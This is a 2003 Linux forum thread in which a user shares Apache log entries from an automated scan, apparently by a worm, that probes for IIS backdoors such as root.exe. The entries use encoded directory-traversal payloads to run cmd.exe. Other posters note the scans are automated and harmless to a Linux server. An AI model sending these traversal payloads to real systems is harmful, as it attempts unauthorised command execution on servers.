Find the answer to your Linux question:
Results 1 to 4 of 4
i was looking through my apache logs and found this. Maybe it's just me, but i lauged my ass off for 5 minutes 24.243.218.156 - - [07/Jun/2003:16:51:12 -0400] "GET /scripts/root.exe?/c+dir ...
Enjoy an ad free experience by logging in. Not a member yet? Register.
  1. #1
    Just Joined!
    Join Date
    Jun 2003
    Posts
    6

    i just thought this was hillarious .....


    i was looking through my apache logs and found this. Maybe it's just me, but i lauged my ass off for 5 minutes
    24.243.218.156 - - [07/Jun/2003:16:51:12 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 302 395 "-" "-"
    24.243.218.156 - - [07/Jun/2003:16:51:13 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 302 395 "-" "-"
    24.243.218.156 - - [07/Jun/2003:16:51:13 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 395 "-" "-"
    24.243.218.156 - - [07/Jun/2003:16:51:13 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 395 "-" "-"
    24.243.218.156 - - [07/Jun/2003:16:51:13 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 395 "-" "-"
    24.243.218.156 - - [07/Jun/2003:16:51:13 -0400] "GET /_vti_bin/..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 395 "-" "-"
    24.243.218.156 - - [07/Jun/2003:16:51:14 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 395 "-" "-"
    24.243.218.156 - - [07/Jun/2003:16:51:14 -0400] "GET /msadc/..%255c../..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 395 "-" "-"
    24.243.218.156 - - [07/Jun/2003:16:51:14 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 395 "-" "-"
    24.243.218.156 - - [07/Jun/2003:16:51:15 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 418 "-" "-"
    24.243.218.156 - - [07/Jun/2003:16:51:15 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 395 "-" "-"
    24.243.218.156 - - [07/Jun/2003:16:51:15 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 395 "-" "-"
    24.243.218.156 - - [07/Jun/2003:16:51:15 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 409 "-" "-"
    24.243.218.156 - - [07/Jun/2003:16:51:16 -0400] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 409 "-" "-"
    24.243.218.156 - - [07/Jun/2003:16:51:17 -0400] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 395 "-" "-"
    24.243.218.156 - - [07/Jun/2003:16:51:17 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 395 "-" "-"
    now the most hillarious part is when he got the first 404 message it told him
    Apache-AdvancedExtranetServer/2.0.44 (Mandrake Linux/11mdk) etc ...
    just how stupid are people these days, root.exe cmd.exe on a linux ???? and it tells ya that it's a linux server !!!! ... well i hope you find that as funny as i do

  2. #2
    Linux Guru
    Join Date
    Oct 2001
    Location
    Täby, Sweden
    Posts
    7,578
    I don't mean to spoil your fun, but it's probably not someone just being stupid, it's probably an automated port scanner from someone who has gottent infected with a worm. For some reason, I'm getting few of these nowadays, but I used to get hundreds of these requests per day.

  3. #3
    Just Joined!
    Join Date
    Jun 2003
    Posts
    6
    dammit !!!!!!!!!!!!!!!!!!!!!!!!!!
    you had to, you JUST had to spoil the fun, didn't you!!! well thanks a lot, now it's not not nearly as funny

    anyway yea i kinda figured it was automated. i actually get anywhere from 10 - 50 a day i'd say, haven't really counted. but i still think it's funny when i think of root.exe, i wasn't aware that the linux root was a windows executable LMAO

  4. #4
    Just Joined!
    Join Date
    Jun 2003
    Location
    Helsinki, Finland
    Posts
    78
    I love seeing those messages too. It's like watching water fall off a ducks back.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •